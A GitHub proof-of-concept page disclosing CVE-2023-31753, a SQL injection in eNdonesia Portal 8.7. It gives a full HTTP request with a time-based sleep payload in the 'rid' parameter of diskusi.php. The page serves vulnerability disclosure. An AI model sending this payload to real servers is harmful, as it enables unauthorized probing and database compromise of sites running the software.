Headline
CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7
SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the “rid=” parameter.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Proof of Concept for CVE-2023-31753
Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into “rid” parameter in diskusi.php.
- Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
- Date: May 19, 2023
- Exploit Author: Kunal Khubchandani
- Vendor Homepage: http://www.endonesia.org/
- Software Link: https://sourceforge.net/projects/endonesia/
- Version: 8.7
- Category: Webapps
- Tested on: WiN11_x64/KaLiLinuX_x64
- CVE : CVE-2023-31753
#POC:
To exploit this vulnerability, one must send a SQLi sleep payload as a value of “rid” GET Parameter in the following HTTP request.
Vulnerable Request:
GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0
- Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.
** 20 Seconds Delay:
** 30 Seconds Delay: